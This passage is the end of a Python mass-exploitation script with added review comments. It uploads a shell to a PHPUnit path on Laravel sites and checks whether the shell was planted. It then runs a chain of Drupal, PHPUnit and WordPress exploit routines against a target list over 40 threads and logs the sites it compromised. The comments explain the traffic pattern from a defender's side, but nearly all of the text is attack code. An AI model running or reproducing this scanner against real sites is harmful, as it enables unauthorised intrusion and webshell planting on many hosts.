  460. t = url+'/vendor/phpunit/phpunit/src/Util/PHP/muach.php'
  461. da=requests.post(url, data=upshell, timeout=5)
  462. bbb = requests.get(t).text
  463. if 'Linux' in b:
  464. print('{}[ {}VULNERABLE {}]{} {} {}[ {}LARAVEL {}] ' .format(fr,fc,fr,fg,url,fr,fc,fr))
  465. print(' {}[ {}+ {}] {}Exploiting...' .format(fr,fc,fr,fc))
  466. if 'Avinash Kumar Thapa' in bbb:
  467. print('{}[{}+{}]{}{} [ {}SUCCESS {}]{}[{}LARAVEL{}]' .format(fr,fc,fr,fg,url,fc,fg,fc,fg,fc))
  468. open('php_unit.txt', 'a').write(url + "\n")
  469.  
  470. else:
  471. print('{} [ {}- {}] {}Exploit Failed' .format(fc,fr,fc,fr))
  472. else:
  473. print('{}[ {}NOT VULNERABLE {}] {}{}' .format(fc,fr,fc,fg,url))
  474. except requests.exceptions.ConnectTimeout:
  475. print("{}[ {}NOT VULNERABLE {}] {}{} {}[{}CONNECTION TIMEOUT {}] " .format(fc,fr,fc,fg,url,fc,fr,fc))
  476. except Exception as e:
  477. print('{}[ {}NOT VULNERABLE {}] {}{} {}[ {}URL ERROR {}] ' .format(fc,fr,fc,fg,url,fc,fr,fc))
  478.  
  # wordpress_cubed(site): unfinished stub. It only normalises the URL, sends no
  # request, and is not called from Run_Work.
  479. def wordpress_cubed(site):
  480. url = Domains(site)
  481.  
  482.  
  # Run_Work(site): per-target worker. It runs every check in sequence against one
  # site: four Drupal/PHPUnit routines, then six WordPress ones. No fingerprinting
  # step precedes them, so each target receives the full request set whatever it
  # runs; from the server side this appears as one client hitting unrelated Drupal,
  # PHPUnit and WordPress paths within seconds.
  # NOTE(review): indentation was lost in this paste, so it is unclear whether the
  # final os.system('clear') belongs to this function or is a top-level statement.
  483. def Run_Work(site):
  484. url = Domains(site)
  485. drupal7_1(url)
  486. phpunit(url)
  487. mail(url)
  488. timezone(url)
  489.  
  490. wp_spritz(url)
  491. ad_manager(url)
  492. backup(url)
  493. wp_reset(url)
  494. Arforms_config(url)
  495. wp_install(url)
  496.  
  497. os.system('clear')
  # Main(): maps Run_Work over the loaded target list `woh` with a pool of 40
  # workers (multiprocessing.dummy, i.e. threads), then prints the elapsed time.
  # Nothing here rate-limits or restricts scope, which is why this traffic shows up
  # as bursts against many unrelated hosts.
  498. def Main():
  499.  
  500.  
  501. start = timer()
  502. pp = ThreadPool(40)
  503. pr = pp.map(Run_Work, woh)
  504. print('Time: ' + str(timer() - start) + ' seconds')
  505.  
  506.  
  # Script entry point. The triple-quoted string after the Main() call is leftover
  # dead code: it is a bare string expression and is never executed.
  507. if __name__ == "__main__":
  508. Main()
  509. """
  510. if 'Linux' in ambush:
  511. print("{} --> vuln" .format(kontil))
  512. else:
  513. print("{} --> Not Vuln" .format(kontil))
  514. """